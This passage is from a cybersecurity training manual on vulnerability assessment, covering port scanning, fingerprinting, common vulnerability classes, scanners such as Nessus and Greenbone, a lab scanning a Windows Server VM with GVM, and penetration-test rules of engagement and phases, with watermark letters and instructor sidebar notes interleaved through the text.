diagnosing network connectivity issues, detecting anomalous network

behavior, and gathering traffic statistics that can be used to assess which
D
protocols are most vulnerable in a network.

Packet analyzer Captures and decodes the actual content of particular network packets
sent using various network protocols. This can be useful for filtering
certain packets to keep them from communicating across the network, as
well as verifying that security controls, like firewalls, are working as
intended.

Vulnerability Description
Assessment Tool
Network enumerator Gathers information on users, groups, and services on a network without
authenticating to the device. Network enumerators often use protocols
like ICMP and Simple Network Management Protocol (SNMP) to
discover network hosts and retrieve the information.
Password cracker Used to recover secret passwords from data stored or transmitted by a
computer.
e
Fuzzer Sends an application random input data to see if it will crash or expose a
ut
vulnerability. These tools can be useful in detecting any faults that will
expose sensitive information in an application, and especially in web apps.
ib
HTTP interceptor An application or device used to read HTTP communications or web
traffic.
tr
Exploitation Provides a consistent and reliable environment to create and execute
framework exploit code against a target.
is
Intelligence gatherer Gathers information regarding a target organization before actually
conducting the attack for the purpose of discovering key information and
D
vulnerabilities without being detected. Methods include taking advantage
of people exposing too much on social media sites, using the Whois
domain lookup to retrieve Internet registration information, and mapping
Port Scanning
a network's topology.
or
e
ICMP is typically used by a port scanner to perform the preliminary check to determine what Port Scanning
at
devices on the network are alive and responding before a real port scan is carried out. This is done
for optimization reasons, as a full port scan of all 65,535 ports for both the UDP and TCP protocols
can be time consuming. By checking if the device is alive and responding using ICMP discovery, you
lic
can reduce the overall length of time it takes to port scan a large network. Take caution when using
this default setting, as devices can be configured to not respond to ICMP echo requests and will be
skipped by the port scanner.
up
D
ot
N
o
D
Figure 6-5: The results of a port scan.

Fingerprinting
Fingerprinting Fingerprinting is the technique of determining the type of operating system and services a target
uses by studying the types of packets and the characteristics of these packets during a
communication session. Fingerprinting typically relies on TCP/IP to provide this information.
There are two types of fingerprinting: active fingerprinting and passive fingerprinting.
Active fingerprinting is performed with a scanning tool that sends specifically crafted packets and
examines their responses to determine the operating system version and service-related information.
For example, an assessor may simply establish a Telnet session or create a socket connection to an
e
open port to observe the response. Web servers and mail servers are notorious for responding with
ut
operating system and application version information in the initial response header.
Passive fingerprinting attempts to learn more about a targeted service without the target knowing it.
Passive fingerprinting is a form of packet sniffing, in that the packets are captured during normal
ib
communications with the service and then are examined for specific characteristics and oddities.
Every operating system's IP stack has its own idiosyncrasies, and it is up to the IP stack developer to
determine how certain protocol communications are handled and set.
tr
is
Networking Vulnerabilities
Networking The following is a list of some common vulnerabilities in network infrastructure and appliances:
D
Vulnerabilities • Lack of network segmentation: A network infrastructure that isn't divided into subnets may
The following end up being a single point of compromise for an attacker's benefit. If the attacker breaches the
vulnerability lists are not
exhaustive; they merely
point out a few common
examples.
or
network, they may have access to all nodes, rather than just the nodes in their segment. Poorly
segmented networks also present a problem when the incident response team tries to contain
worms and other fast-spreading malware.
• Insufficient security of interconnected networks: Some organizations or divisions within an
e
organization run networks that are independent, yet offer some measure of integration. Even if
one network has robust security, it can still be contaminated by the other network if the other
at
network is insecure.
• Insecure authentication used in virtual private networks (VPNs): Some VPNs include the
lic
standard Microsoft Challenge-Handshake Authentication Protocol (MS-CHAP) as an option, but

this protocol has several weaknesses. Attackers may be able to brute force the authentication
process to gain access to the network from the outside.
up
• Poorly configured endpoints: Since endpoints are the gatekeepers of your network, an attacker
who is able to breach their defenses can find a way into the network. Endpoint vulnerabilities
tend to result from weak or non-existent anti-malware solutions and insufficient access control.
• Sensitive data transmitted across the network in plaintext: If an attacker gains access to the
D
network, they may be able to sniff traffic on their network segment and inspect each packet for
useful data. This process is much more lucrative to an attacker when no transport encryption
method is active.
ot
• Poorly secured network appliances: Switches can be overloaded in a DoS attack if they fail to
incorporate loop protection and flood guards. Routers may fail to drop network packets from
N
spoofed or unknown sources if not configured properly. Firewalls may not adequately filter
inbound traffic if they are not adhering to the principle of implicit deny. All of these and other
access points may be placed incorrectly within the logical or physical topology of the network,
o
leading to sub-optimal performance.

• Poorly secured wireless access points (WAPs) and wireless routers: WAPs and routers with
D
management consoles that are still configured with default credentials can be breached by an
attacker with access to the signal. Even if the management console is secured, certain wireless
communication protocols are obsolete and easily cracked, namely Wired Equivalent Privacy
(WEP) and Wi-Fi Protected Setup (WPS).
• Flaws in network infrastructure and services: Vulnerabilities in network services like digital
subscriber line (DSL) can impact your infrastructure. For example, certain DSL modems have
been shown to be vulnerable to command injection and information leakage exploits that enable

attackers to take over the modem for use in a botnet. IP addressing is also a potential flaw in the
network infrastructure if IP address management (IPAM) techniques are not properly
implemented, or if there are conflicts between IPv6 traffic on IPv4-only networks, and vice
versa.
• Insufficient monitoring and alerting capabilities: Without event monitors positioned at key
points within the network, attempted or successful attacks will go unnoticed by the organization.
Alerts without context can also confuse security analysts and make it difficult for them to
identify the problem and take action.
e
Host Vulnerabilities
ut
The following is a list of some common vulnerabilities in hosts and the operating systems they run: Host Vulnerabilities
• Unnecessary services running on servers: Because servers are such important devices in any
ib
organizational environment, they are some of the most common targets of attacks. A server with
too many running services will increase its attack surface, and subsequently, its risk of
tr
compromise.
• Misconfigured access control mechanisms: Default passwords, active guest accounts, active
is
accounts from former employees, and poorly managed privileges can easily lead to an attacker
gaining access to a device. Additionally, access control mechanisms that don't follow an
organization's policy may fail to secure business objectives and either be too restrictive to
D
authorized entities or too permissive to unauthorized entities.
• Changes to the system: Most systems need to change in some way, whether it's adding
software, changing system configuration, storing data, and so on. If these changes are not tracked
vulnerable. or
and managed, it will be more difficult to detect ways in which they can leave the system
• Weak at-rest encryption: Sensitive information must be kept confidential, which almost always
e
requires some sort of encryption. If devices use obsolete encryption algorithms and schemes, like
Data Encryption Standard (DES) for symmetrically encrypting data, then the confidentiality
at
of information is vulnerable to compromise.

• No bring your own device (BYOD) plan: Without a plan to incorporate the BYOD
lic
phenomenon in your organization, employees' mobile devices may pose a serious risk to the rest
of your network and systems. You have little to no control over employees' personal devices
outside the organization, which means you can't prevent these devices from being compromised,
which then introduces threats to your environment.
up
• Lack of effective anti-malware tools: While common anti-malware solutions are far from
perfect, they are still effective at detecting and removing many strains of malware. Administrators
and users often fail to install these solutions on their devices or they fail to enable real-time
D
scanning features.
• Unpatched operating systems: Without a plan for issuing security fixes to affected systems,
those systems will remain vulnerable to a variety of potential threats.
ot
• Poor physical security: No amount of hardening will keep a device secure if someone can just
walk into an office and steal it. Attackers may also be able to damage or tamper with devices if
they aren't properly locked up and behind layers of physical access control.
N
IoT Vulnerabilities
o
Internet of Things (IoT) devices are vulnerable to much the same types of attacks as other
computing devices. However, it tends to be easier to exploit these vulnerabilities because of how
D
insecure many such devices are by design and operation. For example, many IoT devices don't force
the user to change the default access credentials, and in some cases, hard-code those credentials so
they cannot be changed. Because they are connected to the Internet, these devices are easily
discoverable online and are attractive targets to attackers. Likewise, IoT devices are limited in
processing power and may be unable to incorporate security functionality like encryption that
consumes a significant amount of resources.

Note: An easy way to discover insecure IoT devices is to use Shodan (https://
www.shodan.io/), a search engine that crawls the Internet for connected devices such as IP
cameras, network appliances, industrial control systems, and more.
Application Vulnerabilities
Application The following is a list of some common vulnerabilities in applications:
Vulnerabilities • Improper input handling: Poorly handled input in applications can lead to unauthorized users
e
gaining access to a system or additional privileges. In other cases, the input may disrupt the
ut
system and cause a denial of service.
• Improper error handling: Applications may reveal too much information about how the app
functions in error messages, which can help an attacker with their reconnaissance efforts. Errors
ib
also become a security issue when the app can't handle them gracefully, i.e., the app ends up
consuming too many system resources and becomes unstable.
tr
• Weak cryptographic implementations: Like with operating systems, an application that uses
weak ciphers or weak implementations of cryptography will put the sensitive data it works with
at risk. For example, an app that uses the Message Digest 5 (MD5) algorithm to hash passwords
is
is insecure.
• Memory vulnerabilities: There are many memory-based vulnerabilities, such as memory leaks
D
and buffer overflows. Most such vulnerabilities lead to system instability, and some can even
enable an attacker to inject malicious code into an area in memory to gain control of a system or
read sensitive data.
or
• Flaws in network management software: Networking software is meant to streamline and
optimize network operations and management, but flaws in these tools can have the opposite
effect on the network as a whole. For instance, a network management platform that doesn't
integrate properly with your unique environment can lead to network delays and bandwidth
e
issues, and may even violate security policy.
at
• Misconfigured rules for firewalls, intrusion detection systems (IDSs), and other network
security applications: Many such applications have a default rule set that can shape traffic to
some degree, but this is rarely adequate. A rule set that fails to incorporate the organization's
lic
security policies will be unable to do its part in mitigating risk. Misconfigured rules can be both
too restrictive and too lax—the former may interrupt availability, and the latter may enable an
attacker to slip past its defenses.
up
• Poorly secured configuration files: In addition to configurations themselves being flawed, the
files they are stored in can also be weak against unauthorized reading and modification. If these
files aren't properly protected through encryption and access control, an attacker can more easily
D
perform reconnaissance on an application or alter the way it functions.

• Flaws in database software: There are many potential flaws in database software, including
flaws in deployment, design, and redundancy measures. One specific vulnerability common to
ot
databases that interface with the web is SQL injection. By injecting malicious SQL statements in
a web query or form, an attacker can dump the contents or delete entire tables in a database.
N
Virtual Infrastructure Vulnerabilities

o
Virtual Infrastructure The following is a list of some common vulnerabilities in virtualized hosts and networks:
Vulnerabilities • Misconfigured virtual machine (VM) hosts and guest images: When VMs are poorly
D
configured for security, they're exposed to many of the same issues as a physical machine. The
difference is that VMs are designed to be quickly replicated and provisioned over many instances
—a misconfiguration in just one base image will propagate throughout your infrastructure,
resulting in a much larger impact.
• Insecure virtual network appliances: The security capabilities of virtual networking appliances
may differ between vendors or configurations. For example, virtual switches in certain modes
may not behave fully like physical switches—they may fail to isolate traffic between hosts within

a virtual network. An attacker inside one VM may be able to sniff all traffic from another VM on
the same virtual switch.
• Improperly secured management interface: If an attacker gains unauthorized access to the
VM's management interface, they can essentially take full control of all attached virtual systems.
The management interface may be on the physical host that runs the VMs, or it may be a
centralized platform that oversees VMs from multiple physical hosts. In either case, it is
vulnerable to compromise.
• Improper management of physical resources: VMs and networks rely on their physical hosts
for processing. If more resources are provisioned to VMs than their physical hosts can handle,
e
the virtual infrastructure will suffer disruptions. This directly impacts the availability of systems
used by customers and internal personnel alike.
ut
• Insecure VM hypervisors: Attackers inside a VM can escape from that VM through flaws in its
hypervisor. This can enable attackers to access the host hardware and have total control over any
ib
virtual environment running on that host.
• Poor change control and patch management processes: If a security fix needs to be applied
to a physical host, especially a fix updating the hypervisor, this can cause disruptions for the
tr
virtual environments it runs. In addition, the virtual instances themselves will need to be patched
from time to time—if no process is in place to manage these changes, it can be difficult to ensure
is
that all instances receive the fix as quickly as possible with minimal interruption.
• Lost system logs: VM instances are most useful when they are elastic, meaning they are
D
optimized to spin up when needed, and then power down when not. This process of constant
provisioning and deprovisioning means any logs stored on the instances themselves may be lost.
This makes the tasks of analyzing user and system behavior and performing after-incident
forensics much more difficult for security personnel.
Vulnerability Scans
or
e
When a company tests a computer system or network, it is generally testing a production network Vulnerability Scans
at
that is live. Security tests are rarely conducted on offline or test networks. A vulnerability scan uses Consider having
various tools and security utilities to identify and quantify vulnerabilities within a system, such as students start keying the
lacking security controls and common misconfigurations, but does not directly test the security activity first, and then
lic
features of that system. present the content in

this topic. This will help
In a vulnerability scan, information may be collected in a number of ways: you avoid any down time
up
• Active scanning: Looking directly at a device's configuration, for example. in class. Also consider
running the scan on your
• Passive assessment: Analyzing indirect evidence resulting from a certain configuration, such as
computer beforehand so
the types of traffic generated by a device or their behavior, for example. students can see results
• Through agents installed on the system or through server-based scanning mechanisms.
D
right away.
Vulnerability scanners can be configured to collect information in different ways based on the
criteria you provide. For example, you may wish to widen the scope of a scan to see more potential
ot
issues, or narrow the scope to quickly identify problems you already suspect are present. You can
also configure scanning tools to scan only certain types of data or only data that meets a specific
sensitivity level as classified by the organization. By default, most scanning tools are hooked into the
N
vendor's vulnerability feed or some other common vulnerability database. If you've determined your
own scanning criteria, you may be able to change the feed the tool uses, which can alter what the
scan actually detects.
o
Credentialed vs. Non-Credentialed

D
Vulnerability scans may be credentialed in that they implement credentials to ascertain vulnerabilities
at the highest privilege levels. Or, they may be non-credentialed, meaning they run without
credentials to see what a hacker would see at a lower level. Although you may discover more
weaknesses with a credentialed scan, you sometimes will want to narrow your focus to think like an
attacker who doesn't have specific high-level permissions or total administrative access. This can
also save you time and resources, both of which may be more costly in a credentialed scan.

SCAP
Many popular vulnerability scanners are validated with respect to the Security Content
Automation Protocol (SCAP), a framework developed by the National Institute of Standards and
Technology (NIST) that automates the vulnerability management process, including identifying
flaws in security configurations. A SCAP-validated tool adheres to standards for scanning processes,
results reporting and scoring, and vulnerability prioritization. SCAP is commonly used to uphold
internal and external compliance requirements. Some tools that are not officially SCAP-validated
have plug-ins that can still export scan data to a SCAP-compliant format.
e
Specific Vulnerability Scanning Tools
ut
Specific Vulnerability Many vulnerability scanning tools are available commercially. Some are considered "targeted"
Scanning Tools vulnerability scanners in that they are intended to scan specific platforms or discover specific types
ib
of vulnerabilities. Others are general vulnerability scanners that apply to many platforms and look
for a broad set of flaws.
tr
• Tenable Nessus® is a comprehensive vulnerability scanner that provides high-speed discovery,
configuration auditing, asset profiling, sensitive data discovery, and vulnerability analysis.
is
Although free of charge for personal use in a non-enterprise environment, enterprise
organizations must purchase a subscription to use Nessus. For more information, see https://
www.tenable.com.
D
• The System Administrator's Integrated Network Tool (SAINT®) vulnerability scanner
screens every live system on a network for TCP and UDP services. For each service it finds
or
running, it launches a set of probes designed to detect anything that could enable an attacker to
gain unauthorized access, create a DoS attack, or gain sensitive information about the network.
For more information, see https://www.carson-saint.com/.
• The Qualys® Vulnerability Management tool is an assessment and scanning suite that
e
provides continuous monitoring services and a cloud-based management platform. It also
integrates compliance requirements into the monitoring and scanning process. For more
at
information, see https://www.qualys.com.

• Rapid7 Nexpose is a vulnerability scanner that generates contextual risk-based scores and
lic
reports for vulnerabilities on a wide variety of enterprise software and hardware platforms. It also
offers continuous monitoring capabilities. For more information, see https://
www.rapid7.com.
up
• The GFI® LanGuard™ scanner can check networks and ports to detect, assess, and correct
security vulnerabilities, including standard vulnerability issues, patch management, and network
auditing. For more information, see https://www.gfi.com.
Additionally, a number of freeware vulnerability scanning tools are available, including:
D
• The Greenbone Vulnerability Management (GVM) platform is an open source vulnerability

assessment and scanning framework. It incorporates a regularly updated database of Network
ot
Vulnerability Tests (NVTs) to identify and categorize the latest known vulnerabilities. It was
previously known as OpenVAS. For more information, see https://www.greenbone.net/en/.
• Nikto2 is an open source tool that targets web server vulnerabilities. It quickly scans a server for
N
known malware, common security misconfigurations, and outdated software. For more
information, see https://cirt.net/Nikto2.
o
ACAS
D
Tenable's Assured Compliance Assessment Solution (ACAS) is a solution that integrates various
vulnerability assessment tools, including Nessus, into a single suite validated by the Defense
Information Systems Agency (DISA), a child agency of the U.S. Department of Defense (DoD).
ACAS enables the DoD and its customers to meet the strict DISA compliance standards.

Vulnerability Report Analysis

In many cases, the results of a vulnerability scan won't be simple and straightforward. You shouldn't Vulnerability Report
expect there to be a single button on the report that says "fix all problems" and for it to actually Analysis
work as advertised. Instead, you'll need to use careful judgment and your experience with
cybersecurity to analyze reports and get to the heart of each issue. Being able to draw out the facts
behind the report is a crucial skill that all security analysts must possess.
One major component to this skill is being able to identify false positives. Like any automated
system, vulnerability scanners do not have a perfect amount of insight into your organization's
e
environment, nor can they make context-based decisions at the same level as a human analyst. So,
ut
you need to be able to truly understand each vulnerability the scanner presents to you, and then
consider how that vulnerability exists in your environment. This will enable you to see any
discrepancies with the general vulnerability definition and how that definition may manifest in your
ib
systems. For example, a vulnerability scanner may be correct in pointing out that your web server is
missing a critical security patch. But, you may have fixed the security issue through a different
mechanism the scanner isn't detecting—therefore, that vulnerability alert is a false positive.
tr
Another important part of your report analysis skillset is the ability to identify exceptions. In some
cases, you'll have chosen to accept or transfer the risk of a specific vulnerability because it fits within
is
your risk appetite to do so. Nevertheless, the scanner may still produce this vulnerability in its
report. You can therefore mark this particular item as an exception so it won't contribute to your
D
remediation plan. For example, a scanner may tell you that port 80 is open on your web server. This
is certainly a common vector of attack, but the port must remain open so the system can fulfill its
function.
or
Once you've identified the nature of the vulnerability alerts and their validity, you'll need to
determine how to prioritize your response and remediation actions. Using your pre-existing
baselines and risk analysis efforts, you'll be able to decide which vulnerabilities are the most critical
e
versus which are the least critical. Scanner reports often give their best guess by scoring each
vulnerability item, but this typically doesn't take into account the various contextual factors unique
at
to your environment.
lic
Results Validation and Correlation

In addition to identifying the nature of vulnerabilities detected during a scan, you need to support Results Validation and
your overall vulnerability management program by validating the results and correlating what you've Correlation
up
learned with other data points in your organization. After all, the success of your risk mitigation
efforts depends heavily on the accuracy of the vulnerability information you've collected. You need
to be able to reconcile the results of a scan with what you know about your environment, as well as
D
what you know about the current security landscape. Not only can this help you validate your
current situation, but you can also use this information to determine vulnerability trends that may
form over time.
ot
Your organization will most likely be driven by a security policy. You can compare the results of a
scan with this policy to determine if a particular vulnerability is in violation of compliance. Likewise,
N
you probably operate under a large set of best practices recommended by the security industry, even
if those best practices aren't necessarily set in policy. By comparing your scan results to these
practices, you can obtain a clearer picture of how a vulnerability does or does not violate a security
o
principle. In either case, comparing results to existing guidelines or policies will help you validate
whether a particular system in your environment is actually susceptible to exploitation.
D
Correlating the scan results with other data sources, like related system and network logs, can also
enhance the validation process. As an example, assume that your vulnerability scanner identified a
running process on a Windows machine. According to the scanner, the application that creates this
process is known to be unstable, causing the operating system to lock up and crash other processes
and services. When you search the computer's event logs, you notice that several entries over the
past couple of weeks indicate the process has failed. Additional entries show a few other processes

fail right after. In this instance, you've used a relevant data source to help confirm the vulnerability
alert is, in fact, valid.
Guidelines for Assessing Vulnerabilities

Guidelines for Assessing Use the following guidelines when assessing vulnerabilities.
Vulnerabilities
Assess Vulnerabilities
e
When assessing vulnerabilities:
• Decide between a penetration test and a vulnerability assessment based on your business needs.
ut
• Follow an assessment process from collecting data through reporting on results.
• Conduct assessments after certain key events, like an update to critical systems or after a new
ib
vulnerability is discovered.
• Capture baselines of systems before you begin the assessment in earnest.
• Compare future assessments against these baselines.
tr
• Select the proper assessment tool for the job and consider implementing multiple tools to gain a
broader perspective.
is
• Implement port scanning and fingerprinting to identify basic network-related weaknesses in
hosts.
D
• Familiarize yourself with common vulnerabilities in networks, hosts, and applications.
• Configure vulnerability scan characteristics, including scope, data feeds, sensitivity level, and
credentialed vs. non-credentialed, according to business needs.
or
• Familiarize yourself with the different vulnerability scanners available.
• Choose one or more scanners that best fit the needs of your vulnerability management program.
• Identify any false positives in vulnerability scan results.
e
• Create exceptions for certain items in a vulnerability scan, when necessary.
at
• Use existing baselines and risk analysis to prioritize your response to detecting vulnerabilities.
• Reconcile scan results with what you know about your environment, and what you know about
the security landscape.
lic
• Compare scan results to compliance policy and industry best practices.

• Correlate scan results with other data for validation.
up
D
ot
N
o
D

ACTIVITY 6-3
Conducting Vulnerability Scans
Data File
e
/home/kali/vuln_report.xml
ut
Activity: Conducting
Before You Begin Vulnerability Scans
You'll be using your Kali Linux VM in this activity. You'll also be using the Greenbone Security This data file is a saved
ib
report of a successful
Assistant (GSA), a vulnerability scanning platform and web interface that runs on the Greenbone
scan. If students' scans
Vulnerability Management (GVM) scanning engine, formerly known as OpenVAS. fail or don't produce
tr
useful results, they can
Scenario import this file into GSA
is
Now that you have your vulnerability management plan in place, you'll want to initiate a and review it instead.
comprehensive vulnerability scan of your systems. You will begin by deploying Greenbone Security To import the saved
Assistant. Using GSA, you'll run a preliminary scan on your Windows Server® 2019 system to detect report, select
D
Scans→Reports and
any immediate issues that may conflict with your risk management strategy.
then the Upload report
button. Browse for the
1. Start the GVM container.

a) Open a terminal in Kali Linux and enter docker start gvm
or
The GVM service and its GSA interface are both running in a Docker container.
report file, then create a
new container task to
add it to. Then, select
Import.
e
b) Enter docker logs -f --tail=5 gvm
at
This will show the progress of the GVM service as it initializes by continually printing log entries to
the terminal as they are written. It may take a few minutes for the GVM service to fully initialize and
be ready for use, so you'll use these logs to identify when it's ready.
lic
Note: If the command terminates and stops showing the log file, run it again.
You can also ignore any permissions errors written to the log.
up
c) When the log indicates the OSPd OpenVAS service is starting, press Ctrl+C to exit the log file.
D
ot
Log in to the GSA web interface.

N
2.
a) From the top panel, select the Firefox ESR icon to open the web browser.
o
D
If students are curious,

ESR stands for
Extended Support
Release, meaning it is
not updated as
frequently as an official
release, and only for the
duration of the extended
b) Navigate to https://127.0.0.1:8080
support period.

c) You are prompted that the certificate is invalid. Select Advanced, and then select Accept the Risk
and Continue.
e
ut
ib
tr
is
Note: In a production environment, you would give GSA a valid web certificate
D
to use.
d) At the login page, enter admin as the user name and Pa22w0rd as the password, and then select
Sign In.
or
e) Verify you are taken to the GSA dashboard.
e
at
lic
up
D
3. Create a new scan task.

a) From the menu, select Scans→Tasks.
ot
b) From the top-left of the page, select the New Task option.
N
o
D
c) In the New Task dialog box, in the Name text box, type Server Scan
d) Next to the Scan Targets drop-down list, select the Create a new target button.
e) In the New Target dialog box, in the Name text box, type Server

f) In the Hosts section, next to the Manual radio button, type the IP address of your Windows Server
machine.
g) Select Save.
h) Back in the New Task dialog box, verify that Server is listed in the Scan Targets drop-down list.
e
ut
ib
tr
is
D
4.
i) Select Save.
Start the scan.

or
e
a) Verify that your Server Scan task is listed. Select the link to open more details about the task.
at
b) From the controls to the right of the scan name, select the Start button.
lic
up
D
c) Verify that the Status of the task changes to Requested.

ot
N
o
If you prefer, rather than

d) Wait for the Status to change to a percentage, indicating the scan has begun. waiting for the scan to
D
e) Wait for the scan to complete. finish, you can have

If the scan runs properly, it will take several minutes to run. If the status doesn't change from students select the scan
Requested to a percentage after a few minutes, you may need to create a new task and start it. It report while it's running
may also take a minute or so for the scan to go above 0%, though it should go faster after that. to see live results, or
open the provided report
file.
5. Examine the results of the scan. Consider taking a break
and letting the scan run.

a) When the Status changes to Done, select the number 1 next to Reports.
b) Observe the scanner results. The graph shows the number of vulnerabilities detected, categorized
by severity color.
e
Discuss some of these c) Select the link under the Date column.
ut
vulnerabilities with d) Select the Results tab to get a list of the identified vulnerabilities.
students. Do they think e) Select the link to a particular vulnerability to get more information on its impact and any suggested
these vulnerabilities remediation.
ib
need to be addressed,
or are some of them
false positives? How 6. When you fix the major vulnerabilities in a system, how can you ensure they
tr
could students are repaired?
remediate these
A: You can rerun the GSA scan and see if the vulnerabilities persist.
is
vulnerabilities?
7. Why would you not always be able to fix a vulnerability that GSA marks as
D
critical?
A: Answers may vary, but some vulnerabilities require software patching to fix them, and the
organization may not be able to update certain software. Some services may also be marked as
8.
or
critical vulnerabilities by GSA, but must be enabled on the host for a variety of reasons.
What kind of vulnerability is GSA unable to find?

e
A: Answers may vary, but GSA cannot discover policy or social engineering vulnerabilities.
at
9. How can a vulnerability scan like this be useful to a penetration test?

A: Answers may vary, but being able to identify general weak points in an organization can help a
lic
penetration tester focus their efforts on systems most likely to be insecure. The penetration tester
can actively exploit the vulnerabilities identified by GSA, demonstrating the impact of an attack if it
is not prevented.
up
10.Stop GVM and its container.

a) Close Firefox.
b) At a terminal, enter docker stop gvm
D
ot
N
o
D

TOPIC D
Conduct Penetration Testing
You have identified possible vulnerabilities within your organization's systems. Now you will
conduct penetration testing as part of the process to assess your organization's security posture.
e
Rules of Engagement (ROE)
ut
Scope is an integral part of your overall pen testing rules of engagement (ROE). The ROE Rules of Engagement
defines how a pen test will be executed, and what constraints will be in place. This provides the pen (ROE)
ib
tester with guidelines to consult as they conduct their tests, without having to constantly ask
management for permission to do something. It is crucial a pen tester does not exceed their
mandate under the ROE. Testers must use only those tools and techniques named in the contract,
tr
or they could face not only dismissal from the case, but also criminal charges.
is
Although each organization may construct their ROE differently, typical components in an ROE are
as follows.
Consider mentioning the
D
ROE Component Description example of pen testing
company Coalfire,
Introduction This component defines the purpose of the test, the scope of the test, any whose employees
Logistics
with the test. or
additional constraints to observe during the test, and the risks associated
This component identifies how the test will be carried out and by whom.
physically broke into a
courthouse in Iowa as
part of a pen test. Even
though state officials
e
Here you should list the contact information and roles of each tester. You authorized the test, the
also need to define the schedule of the test, where the test will physically local county arrested the
at
take place, and what tools you will be using in the test. employees. The county
downgraded the charges
Communication This component outlines how communication will take place, including from burglary to
lic
who will be notified of certain events, how to notify them, and when. trespassing, but did not
You should also plan for communication with a cybersecurity incident immediately drop the
response team (CSIRT) should a major incident occur as a result of the charges. Only later were
the charges dropped
up
test.
entirely.
Targets This component involves identifying exactly which systems and personnel The following article
will be targeted by the penetration test, including specific information discusses the Coalfire
about the function, purpose, and network address of each asset.
D
incident: https://
www.zdnet.com/article/
Execution This component enables you to create a more in-depth outline of each
charges-dropped-
specific test you plan on conducting, both technical and non-technical. against-penetration-
ot
This is where you should go into as much detail as you can to avoid any testers-who-broke-into-
ambiguity. courthouse/.
N
Reporting This component enables you to define how you will deliver the results of
your tests, the frequency of these reports, and to whom you will be
reporting.
o
Signatures You must have proof that management (generally a Chief Information
Security Officer [CISO], Chief Information Officer [CIO], or equivalent)
D
has authorized your penetration test and agrees to all your terms defined
previously. Signing the document also ensures a measure of non-
repudiation should something go wrong. It is not enough that just anyone
signs off on the pen test; you must be able to prove that people with the
proper authority have signed off on it.
Lesson 6: Assessing the Organization's Security Posture | Topic D

Pen Test Teams

As part of the ROE, organizations will occasionally divide their pen testing exercises into different
color-coded teams, especially for training purposes:
• The white team consists of the personnel who define the ROE and have decision-making
power over the exercise—in other words, they officiate the test. Security and IT managers are
usually members of the white team. Although they do not conduct the tests, white team
members must still take an active interest in the exercise, as they are responsible for ensuring the
test is bringing value to the business. They're often asked to report on the results of the pen test
e
after it has concluded.
• The red team consists of security professionals who are asked to conduct authorized attacks on
ut
the organization. The term "red team" is also used to refer to penetration testers in general, if no
other teams are defined.
• The blue team consists of security professionals who are asked to defend the organization
ib
against the authorized attacks in a penetration test. The term "blue team" is also used to refer to
general network defense and incident response personnel in a real-world context, rather than just
tr
for pen tests.
Third-Party Penetration Tests
is
Occasionally, you'll need to work with a third party who will conduct penetration tests on your
D
systems rather than doing these tests in-house. The advantage of relying on a third party comes
from the fact that some attacks will be external and unpredictable, which is not necessarily
something you can replicate yourself. However, it may be your responsibility to keep this third party
or
grounded and following a strict ROE. In this case, you should ask yourself a few key questions:
• Has the third party agreed to a well-defined scope with the relevant constraints?
• Does the third party carefully document their approach to pen testing?
• Is there a third-party representative I can contact in case of an emergency?
e
• Does the third party carry liability insurance?
at
• Does the third party provide the credentials and professional experience of all their personnel?
• Does the third party keep track of all their testing actions in a log that can be analyzed?
lic
• Can the third party provide well-written reports at the end of the test?
Pen Test Frameworks

up
Pen Test Frameworks There are frameworks that guide penetration testing, some of which target specific industries or
systems. The CHECK framework, for example, was established by the UK security group
Communications–Electronics Security Group (CESG) to ensure government agencies can
D
identify vulnerabilities to their confidentiality, integrity, and availability through testing of networks
and other systems. The Open Web Application Security Project (OWASP) provides knowledge to
the software development community for several different security practices, including pen testing.
ot
However, a de facto approach to penetration testing is outlined in the Open Source Security
Testing Methodology Manual (OSSTMM), and it has a primary goal of providing transparency.
N
The OSSTMM outlines every area of an organization that needs testing, as well as goes into details
about how to conduct the relevant tests.
Although your organization may choose to follow OSSTMM, there are other standards and
o
frameworks available in the field of penetration testing. The Penetration Testing Execution
Standard (PTES) was established in 2009 by industry experts to cover seven phases of a
D
penetration test, starting with pre-engagement interactions and ending with reporting. The PTES
also comes with an in-depth technical guide to supplement the main standard.
Another framework is CBEST, created by the British non-profit Council for Registered Ethical
Security Testers (CREST). CBEST is geared toward the financial sector and relies heavily on
threat intelligence, while focusing on persistent threats.

Another scheme for the certification of pen testers to ensure an appropriate level of skill is the
Tigerscheme, which is run and managed by the University of South Wales Commercial Services. It
provides a way for skills and experience to be formally recognized. Skills assessments leading to
certification are rigorous, and are based upon academic standards. It does not apply a theory-only
approach, other than at the entry level, but instead focuses on the successful demonstration of
applied knowledge.
Note: Before you undertake any penetration testing, make sure you obtain documented legal
authorization from the system's owner or legal custodian to conduct the test.
e
ut
Common Pen Test Phases
The basic phases of a penetration test remain the same for most frameworks: Common Pen Test
ib
1. Reconnaissance Phases
The tester must gather as much information as possible about the target organization and its
tr
systems. This is done before the actual attack and involves passive intelligence gathering tactics.
2. Scanning
is
The tester will begin actively scanning the systems they have identified in the first phase to
enumerate those systems. This gives the tester a more complete picture of the target.
D
3. Exploitation
This is where the tester begins their attack, targeting whatever vulnerabilities they have identified
in the previous phases.
4. Maintaining access
or
Once the tester breaches the organization's systems, they can install backdoors, rootkits, and
other exploits that enable them to maintain access in the future. This helps illustrate
e
vulnerabilities that can harm the organization over the long term, even after an active breach has
at
been identified.
5. Reporting
lic
The tester must conclude their operations by reporting their findings to the appropriate
personnel. The report is the primary deliverable of a pen test. Reports are vital in debriefing
these personnel on the vulnerabilities found in the test, the risks these vulnerabilities pose to the
organization, and any suggested ways to mitigate these problems. An executive summary that
up
managers can understand should be included, along with very specific technical results for the IT
staff.
D
ot
N
o
D

e
ut
ib
tr
is
Figure 6-6: The phases of a typical penetration test.
D
Pen Tester's Knowledge of the Target
Here you could start a When it comes to the first phase of the pen test—reconnaissance—there are three possible
discussion regarding the
trade-off between time/
cost vs. information
gleaned from these
approaches:
or
• The black box approach simulates an outside attacker who would know nothing about the
target. The pen tester must do their own reconnaissance.
• The white box approach simulates an inside attacker who would have extensive knowledge
e
tests.
about the target. The pen tester does not need to perform their own reconnaissance, as this is
at
provided for them.

• The grey box approach simulates an inside attacker that knows something about a target, but
not everything. The pen tester must do additional reconnaissance beyond what has been
lic
provided to them.
Pen Test Scope

up
Pen Test Scope It's important for your organization to define the scope of these tests before you begin. You need to
know exactly what you are and are not allowed to do. Otherwise, you may interrupt important
D
business processes that could in turn introduce unwanted, serious risk to the organization. Likewise,
not going far enough in your tests will limit their effectiveness, and you could potentially miss
significant vulnerabilities. Some of the limitations that define the scope of your tests can include:
ot
• Which tools you may and may not use.

• Which techniques you may and may not use.
N
• When you are allowed to conduct the tests—both time and date.
• How often you are allowed to conduct tests.
• Knowing when to stop to prevent further disruption to the business.
o
D
External vs. Internal Pen Testing

